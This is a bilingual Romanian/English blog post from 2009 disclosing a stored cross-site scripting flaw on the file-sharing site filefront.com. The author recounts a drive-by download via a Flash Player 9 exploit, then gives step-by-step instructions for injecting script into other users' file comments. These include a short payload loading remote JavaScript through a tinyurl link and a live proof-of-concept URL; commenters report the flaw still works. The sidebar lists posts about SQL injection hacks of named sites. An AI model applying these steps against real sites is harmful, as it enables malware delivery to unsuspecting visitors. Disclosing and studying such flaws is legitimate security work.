- Apocalipsa dupa Nemessis
- Cand dorinta de afirmare depaseste granitele bunului simt – PaxNwo un leecher ordinar
- Cum sa iti protejezi adresa e-mail si datele confidentiale din aceasta
- Mi s-a furat id-ul de messenger/adresa e-mail. Ce sa fac?
- Experiment social II – andimoisescu.ro
- Pentru posteritate
- In curand…
- “Hot” de id-uri messenger
- Chiar ca sunteti retardati
- Ce nu se invata la scoala – Vendetta (6)
- Apocalipsa dupa Nemessis in (103 Visits)
- Ce servicii de mail folositi? in (42 Visits)
- Hackersblog.org is now blog.rstcenter.com in (28 Visits)
- This is the end in (28 Visits)
- Short news in (23 Visits)
- La multi ani România, la multi ani românilor in (23 Visits)
- Azi este ziua userilor hackersblog.org in (16 Visits)
- Raportare vulnerabilitati in (15 Visits)
- Inca o pierdere de timp in (15 Visits)
- Update in (12 Visits)
- Mi s-a furat id-ul de messenger/adresa e-mail. Ce sa fac? in (314 Visits)
- Hi5.com coders read this in (38 Visits)
- SMS scam (1) in (29 Visits)
- Phishing Bancpost in (13 Visits)
- Dezinformare sau proasta informare? in (12 Visits)
- Si tentativele de phishing pot fi amuzante in (11 Visits)
- Phishing Raiffeisen cu atasament html in (7 Visits)
- Cum sa iti protejezi adresa e-mail si datele confidentiale din aceasta in (96 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (56 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (50 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (43 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (35 Visits)
- Virusi in clipuri video [how to] in (34 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (30 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (25 Visits)
- Yahoo! redirects - a big issue (with video) in (16 Visits)
- Ca musca in... in (13 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (174 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (115 Visits)
- Yahoo! epic fail - permanent xss unleashed in (91 Visits)
- Telegraph.co.uk hacked, sql injection in (67 Visits)
- RedTube.com ... The Free Sex Video Community in (61 Visits)
- Kaspersky Thailand hacked by TinKode in (49 Visits)
- Conquiztador Hacked Again in (49 Visits)
- Telegraph.co.uk hacked - when will they learn? in (44 Visits)
- Simona Sensual si profilul ei de hi5 in (40 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (39 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (33 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (30 Visits)
- Digital Photocopiers Loaded With Secrets in (27 Visits)
- Hacker Uses XSS and Google Street View Data to Determine Physical Location in (16 Visits)
- Oldies but goodies - Freedom Downtime - The Story of Kevin Mitnick in (11 Visits)
- [Video] The History Of Hacking in (9 Visits)
- OWASP Phishing demo in (9 Visits)
- Christopher "moot" Poole: The case for anonymity online in (9 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (8 Visits)
- Owasp5005 Part1 - New zero-day browser exploits - ClickJacking in (8 Visits)
- Se poate sparge parola de Yahoo? in (348 Visits)
- phpBB.ro hacked in (105 Visits)
- Experiment social in (71 Visits)
- Cand dorinta de afirmare depaseste granitele bunului simt - PaxNwo un leecher ordinar in (61 Visits)
- Oare cum e pana la urma? in (57 Visits)
- "Hot" de id-uri messenger in (53 Visits)
- Concurs fara premii in (52 Visits)
- Forumul Andreei Balan spart in (47 Visits)
- Ce nu se invata la scoala – Vendetta (6) in (45 Visits)
- Experiment social II - andimoisescu.ro in (44 Visits)
Posted on January 28th, 2009
Acest articol este scris atat in limba engleza cat si in limba romana.
I found a way to include a permanent XSS in a comment to the files uploaded on filesharing site filefront.com. Permanent XSS can do more damage then you might think. This XSS allows javascript into comments and then can be executed when the user downloads the file.
I wanted to download a file from fliefront.com and right when I entered the download page the antivirus warned me of a file orz.exe. I was asked if to run that file or not. I clicked “no” and i looked for it. It was in my Temp folder. I analised that web page and I noticed that there was a particular comment that had a javascript code in it. It forced the web browser to open a flash file (.swf) which was actaully a Flahs Player 9 exploit through which it was downloading and runing an .exe file without the user consent. This is a serious security issue. How to get the XSS: create an account on filefront. Log in, click on Add Blog and you will get a “add blog entry” page. The title is not filtered. This is where you inject teh javascript. The only problem you will encounter is the character limit, 50 that is. Therefore the easiest would be <script src=…, something like: lol<script src=http://tinyurl.com/xxxxxx></script>
I used tinyurl.com to shorten the number of characters. Do not use the ‘ character at src= ‘ ‘
After you created the blog entry, go to the page where you want to “corrupt” the comments and post something. Edit the post and click on Insert Object and then -> Insert Blog. Select from that list the blog entry you just created, Insert Blog, click on “Edit comment”. Thats all
Proof of concept: http://files.filefront.com/testtxt/1;12934435;/fileinfo.html As I was saying, in my case the .exe started to download because I was using Flash Player 9. It doesn’t matter what browser you are using as long as you have javascript enabled. You can get infected with javascript disabled also if you enter a page that has hidden somewhere in the html code something that can open a .swf My advise is to update to the latest version of Flash Player: http://get.adobe.com/flashplayer/
Romanian version:
Am gasit o metoda prin care sa bag un XSS permanent intr-un comentariu la fisierele uploadate pe cunoscutul site de file-upload filefront.com. Probabil spuneti ca nu poti face mare branza cu un XSS, dar va inselati, mai ales in cazul XSS-urilor permanente.
Prin intermediul acestuia putem posta javascript in comentarii, javascript care va fi executat fara stirea userului care intra sa downloadeze fisierul.
Vroiam sa downloadez un fisier de pe filefront si imediat ce am intrat pe pagina de download antivirusul m-a avertizat ca un fisier orz.exe tocmai a fost lansat si ca pare unsafe, intrebandu-ma daca il las sa se execute. Am dat “no”, am cautat fisierul, era prin Temp. Am analizat pagina respectiva si am vazut ca printre comentarii exista unul mai “suspect” care avea injectat si un cod javascript. Acesta forta browserul sa deschida un fisier flash (.swf) care era defapt un exploit pentru Flash Player 9 prin intermediul caruia downloada si rula un .exe fara stirea utilizatorului, fapt care reprezinta o problema foarte grava de securitate.
XSS-ul se obtine in felul urmator: va faceti un cont pe filefront, va logati, dati in stanga la ADD BLOG si o sa va apara o pagina de “add blog entry”. Titlul este nefiltrat, acolo veti injecta cod javascript. Singura problema e ca exista limita de caractere, 50, deci cel mai usor ar fi cu un <script src=..., ceva de genul: lol<script src=http://tinyurl.com/xxxxxx></script>
Am folosit tinyurl.com pentru un link mai scurt sa ne incadram in limita de 50 caractere. Nu folositi ‘ la src=”
Dupa ce ati creat blog entry-ul, mergeti pe pagina fisierului a carui comentarii vreti sa le “infectati” si postati ceva. Editati postul si dati la Insert Object -> Insert Blog. Selectati din lista aia blog entry-ul creat adineauri, Insert Blog, click pe “Edit comment” si gata.
Proof of concept: http://files.filefront.com/testtxt/1;12934435;/fileinfo.html
Cum ziceam, la mine a ajuns sa se downloadeze .exe-ul din cauza faptului ca aveam Flash Player 9. Nu conteaza browserul. Putea sa fi fost Internet Explorer, FireFox, Opera, etc, daca aveam javascript enabled tot ma “prindea”. Si chiar si cu javascript disabled poti fi infectat, din simplul motiv ca poti intra pe o pagina unde sa fie pe undeva ascunsa o bucata de cod HTML care sa deschida un .swf si tot va infectati.
Va sfatuiesc sa va updatati de urgenta la ultima versiune de flash player (momentan e 10): http://get.adobe.com/flashplayer/
January 28th, 2009 at 4:39 pm
Patched, deja?
January 29th, 2009 at 5:33 am
Dupa cate se vede in PoC, still working
February 8th, 2009 at 8:10 pm
un lucru e sigur, inca mai merge:
http://img516.imageshack.us/img516/1821/qwdta3.png